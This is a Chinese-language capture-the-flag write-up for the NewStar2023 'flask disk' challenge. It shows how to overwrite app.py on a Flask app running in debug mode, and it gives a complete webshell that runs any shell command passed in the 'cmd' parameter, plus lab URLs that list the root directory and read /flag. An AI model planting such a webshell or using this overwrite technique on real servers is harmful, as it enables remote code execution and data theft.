NewStar2023-week4---- flask disk
题目提示:a flask disk with a vulneribility. (The application is running on port 5000)
进入页面三个页面,
- 可以看到上传的文件,发现存在
app.py - 上传文件页面
- console页面,需要pin码
我们从了解到信息可以知道,程序运行的端口,和flask属于debug模式,可以修改app.py,重载,
所以说这个提示有时候就是破题点
我们上传一个可以命令执行的app.py,重载一下
from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def index():
try:
cmd = request.args.get('cmd')
data = os.popen(cmd).read()
return data
except:
pass
return "1"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
Payload:
http://dadd7728-72ca-4181-834e-5c35b823c8bb.node5.buuoj.cn:81/?cmd=ls /
http://dadd7728-72ca-4181-834e-5c35b823c8bb.node5.buuoj.cn:81/?cmd=cat /flag
